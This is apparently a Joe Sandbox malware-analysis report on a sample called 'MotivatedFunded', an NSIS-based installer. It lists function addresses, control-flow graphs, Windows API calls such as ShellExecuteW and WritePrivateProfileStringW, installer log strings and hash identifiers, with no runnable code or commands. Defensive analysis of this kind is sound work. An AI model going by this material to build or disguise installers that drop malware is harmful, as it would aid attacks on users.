                                                                    control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2740478559-0
                                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GlobalFree.KERNELBASE(0066E688), ref: 00402387
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGloballstrcpyn
                                                                    • String ID: CharAssociationsLeavingIllustrated$Exch: stack < %d elements$Pop: stack empty
                                                                    • API String ID: 1459762280-81539902
                                                                    • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                    • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • GlobalFree.KERNELBASE(0066E688), ref: 00402387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3376005127-0
                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2568930968-0
                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                    Strings
                                                                    • CharAssociationsLeavingIllustrated, xrefs: 00402770
                                                                    • <RM>, xrefs: 00402713
                                                                    • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                    • String ID: <RM>$CharAssociationsLeavingIllustrated$WriteINIStr: wrote [%s] %s=%s in %s
                                                                    • API String ID: 247603264-1345614601
                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                    APIs
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                    • API String ID: 3156913733-2180253247
                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                    Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                    • String ID: HideWindow
                                                                    • API String ID: 1249568736-780306582
                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                    Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                    Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                    Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                    Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
